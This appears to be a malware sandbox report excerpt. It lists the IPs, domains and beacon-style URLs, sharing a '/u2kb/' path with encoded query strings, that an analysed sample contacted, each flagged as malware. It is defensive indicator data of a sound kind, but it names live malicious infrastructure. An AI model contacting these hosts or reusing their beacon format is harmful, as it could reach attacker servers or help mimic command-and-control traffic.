 thedivinerudraksha.com United States
55293 A2HOSTINGUS true
91.195.240.94
 www.222ambking.org Germany
47846 SEDO-ASDE true
45.33.30.197
 www.thewildphotographer.co.uk United States
63949 LINODE-APLinodeLLCUS true
78.141.192.145
 gritslab.com France
20473 AS-CHOOPAUS true
161.97.163.8
 www.bitservicesltd.com United States
51167 CONTABODE true
81.17.18.198
 www.younrock.com Switzerland
51852 PLI-ASCH true
192.185.17.12
 un-object.com United States
46606 UNIFIEDLAYER-AS-1US true
94.176.104.86
 white-hat.uk Romania
5588 GTSCEGTSCentralEuropeAntelGermanyCZ true
213.145.228.111
 www.energyservicestation.com Austria
25575 DOMAINTECHNIKAT true
199.192.30.147
 www.shapshit.xyz United States
22612 NAMECHEAP-NETUS true

Contacted Domains

Name IP Active
www.bitservicesltd.com 161.97.163.8 true
www.younrock.com 81.17.18.198 true
www.energyservicestation.com 213.145.228.111 true
www.thewildphotographer.co.uk 45.33.30.197 true
www.shapshit.xyz 199.192.30.147 true
www.222ambking.org 91.195.240.94 true
thedivinerudraksha.com 85.187.128.34 true
un-object.com 192.185.17.12 true
white-hat.uk 94.176.104.86 true
gritslab.com 78.141.192.145 true
www.un-object.com unknown unknown
www.white-hat.uk unknown unknown
www.gritslab.com unknown unknown
www.thedivinerudraksha.com unknown unknown
www.fclaimrewardccpointq.shop unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.energyservicestation.com/u2kb/?pJ=y0bMVGhK3R&s7=IK59b/MdFRha+CUVMWpzDpHQ2riuD6F66TLC1fPPNwLnZq29gpb12AWvlZbo17UEh0sBgFvevrMQsuZfYKuNRicmmGgsJT37Uw== true
  • Avira URL Cloud: malware
 unknown
http://www.thedivinerudraksha.com/u2kb/ true
  • 1%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://www.bitservicesltd.com/u2kb/?pJ=y0bMVGhK3R&s7=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7Wl2JIBHu0WW9vDmQ== true
  • Avira URL Cloud: malware
 unknown
http://www.thedivinerudraksha.com/u2kb/?pJ=y0bMVGhK3R&s7=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pROq8Gck3yLtOH/fXnE++yuD9U7pi0eI0K5lBX7KNLg== true
  • Avira URL Cloud: malware
 unknown
http://www.energyservicestation.com/u2kb/ true
  • Avira URL Cloud: malware
 unknown
http://www.un-object.com/u2kb/ true
  • Avira URL Cloud: malware
 unknown
http://www.younrock.com/u2kb/?s7=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm6Scj5xbzg3GdXyuHgSKq8rTPQW1vWIa2Wug==&pJ=y0bMVGhK3R true
  • Avira URL Cloud: malware
 unknown
http://www.thewildphotographer.co.uk/u2kb/ true
  • Avira URL Cloud: malware
 unknown
http://www.bitservicesltd.com/u2kb/ true
  • Avira URL Cloud: malware
 unknown
http://www.gritslab.com/u2kb/ true
  • Avira URL Cloud: malware
 unknown
http://www.gritslab.com/u2kb/?s7=ydCzFiH7iMWnz6xHMre3IWaEcfnK5+fYQUsmgPEoYCSsyD6HgT3yZXCBsea1O+OKnOGwPNRrrKn2ANadQmZjx8zjtO3/lmb0Gg==&pJ=y0bMVGhK3R true
  • Avira URL Cloud: malware
 unknown
http://www.un-object.com/u2kb/?pJ=y0bMVGhK3R&s7=pRDkJdNDOVoQCU+9NHQShuJ8RlIM2fjCZpxzdvjpnmqfDHzh6n+FGyromdVZx0/+Z3ctR0ZwX+ep4hJ0NBR+2QmcJmTx4hb/kQ== true
  • Avira URL Cloud: malware
 unknown
http://www.shapshit.xyz/u2kb/?s7=Yd5Rzn4EVOpL1Cl/e5Amzdaa+E7UlYBpl8BtE0ZhlgLGbR5cH1Fns9iDSFPM0EqDoX1il4mP+EMsdt2zebBtiTAOJDfFAse6Fg==&pJ=y0bMVGhK3R true
  • Avira URL Cloud: malware
 unknown
http://www.white-hat.uk/u2kb/?pJ=y0bMVGhK3R&s7=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0IyZUuXLnrTzZCke5/3tklxZoaLCmex8cw== true
  • Avira URL Cloud: malware
 unknown
http://www.shapshit.xyz/u2kb/ true
  • Avira URL Cloud: malware
 unknown
http://www.222ambking.org/u2kb/?s7=IEUpLmGg2fqLmrhwDd0CH8vm0i8ubOQDFcodV2ACJcW4bHSQscR3aN4MRDv2q1O0g2vnwuasF99orDvyVUesQZcBXW4MNpIrrg==&pJ=y0bMVGhK3R true
  • Avira URL Cloud: malware
 unknown
http://www.222ambking.org/u2kb/ true
  • Avira URL Cloud: malware
 unknown
http://www.younrock.com/u2kb/ true
  • Avira URL Cloud: malware
 unknown